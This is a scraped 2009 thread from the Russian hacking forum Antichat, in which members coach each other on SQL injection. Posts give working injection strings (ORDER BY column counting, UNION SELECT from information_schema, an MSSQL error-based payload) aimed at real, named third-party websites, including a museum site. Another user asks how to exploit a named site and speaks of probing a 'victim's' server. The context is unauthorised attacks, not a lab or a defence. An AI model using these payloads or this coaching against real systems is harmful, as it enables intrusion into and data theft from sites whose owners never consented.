ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
04.05.2009, 23:53
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Saiga
Там дальше комментарии.
Писал я это для того, что-бы показать , что вывод ВОЗМОЖЕН, но не везде разумеется.
Тоесть никто не говорил, что при двойных запросах 100% будет вывод
|
|
|
05.05.2009, 00:11
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912
Репутация:
-4
|
|
Pashkela
я не это спрашивал , извините за кривой вопрос.....
Jokester
пардон , я только "смотрел" )))))
|
|
|
|
05.05.2009, 01:59
|
|
Новичок
Регистрация: 11.04.2009
Сообщений: 3
Провел на форуме:
22054
Репутация:
0
|
|
Доброго времени суток всем.
Подскажите пож. как примерно должен выглядеть запрос ,если ошибка в Mysql выводится при подстановке запятой вот так:
site.com/bla.php?id='5
Интересует именно конструкция запроса.
Заранее благодарен за ответ.
|
|
|
|
05.05.2009, 03:47
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Сообщение от Grookle
как примерно должен выглядеть запрос
Запрос для чего ? Что нужно узнать то ? Какие данные вытащить ?..
Я думаю так, товарищ, начинайте не спеша отсюда:
https://forum.antichat.ru/thread104591.html
потом плавно переходите сюда:
https://forum.antichat.ru/threadnav43966-1-10.html
ну а в идеале не побрезгуйте и этим: (с 1 по 22 включительно)
http://www.sqlbook.ru/
удачи
|
|
|
|
05.05.2009, 12:59
|
|
Познающий
Регистрация: 05.04.2009
Сообщений: 71
Провел на форуме:
299541
Репутация:
5
|
|
Привет! Ребята такой вопрос изучаю сервак жервы и нашел /y_key_ec978e5d0cf6ceb1.html в
что это может бить?
|
|
|
|
05.05.2009, 13:18
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186
Репутация:
905
|
|
Grookle, сотни раз уже писано-переписано
Подбор колонок: site.com/bla.php?id=5+order+by+1000/*
Sql-Inj: site.com/bla.php?id=-999+union+select+1,2,table_name,4,5+from+informati on_schema.tables/*
|
|
|
|
05.05.2009, 13:43
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186
Репутация:
905
|
|
Нечетное кол-во апострофов в результирующем запросе - потенциальная sqlinj
|
|
|
|
05.05.2009, 13:55
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
http://www.powerhousemuseum.com/designersatwork/how.php?ID=10+or+1=(select+top+1+table_name+from+i nformation_schema.tables)--+
mssql
почитай http://forum.antichat.ru/thread30501.html
|
|
|
|
05.05.2009, 14:16
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Сообщение от _SEREGA_
Не выводит таблицы, а выводит ошибку =(
Смотри внимательно, пишет:
Conversion failed when converting the nvarchar value 'Designers' to data type int.
Designers - это и есть табла.
ЗЫ: И пробел убери в ссылке.
Последний раз редактировалось R1dex; 05.05.2009 в 14:19..
|
|
|
|
05.05.2009, 15:35
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Как эту расскрутить?
Код:
http://www.ncmec.eu/case.php?Id=1
Тут походу стоит ограничение на кол-во символов?! |
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
